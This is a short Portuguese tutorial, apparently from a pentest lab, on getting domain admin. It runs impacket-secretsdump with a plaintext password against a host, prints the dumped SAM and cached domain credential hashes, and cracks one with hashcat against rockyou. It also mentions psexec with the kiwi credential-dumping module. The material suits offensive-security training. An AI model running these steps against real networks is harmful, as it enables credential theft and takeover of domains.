Conseguindo domain admin

Para conseguirmos domain admin num ambiente, podemos utilizar algumas técnicas. Uma delas é o secretsdump.

$ sudo impacket-secretsdump orionscorp2/rlourdes:'georgeorwell1984'@172.16.1.253
[sudo] password for user: 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x290e93b533730c6145eca1522ed0439a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f6ff1bd688b85e836aa2b7d6bb60bdcd:::
Usuario:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
ORIONSCORP2.LOCAL/thenrique:$DCC2$10240#thenrique#bffd65356630d9a479f8e6761f56393d
ORIONSCORP2.LOCAL/rlourdes:$DCC2$10240#rlourdes#44678d854a9acf5af8e6ea2a802eabb2

O hash "dcc2" significa Domain Cached Credentials.

Podemos quebrar usando o hashcat.

$ cat hashdomain      
$DCC2$10240#thenrique#bffd65356630d9a479f8e6761f56393d

$ hashcat -m 2100 hashdomain /usr/share/wordlists/rockyou.txt --force

Outra forma é utilizar o psexec e carregar o módulo do kiwi com load wiki e executar o comando creds_all.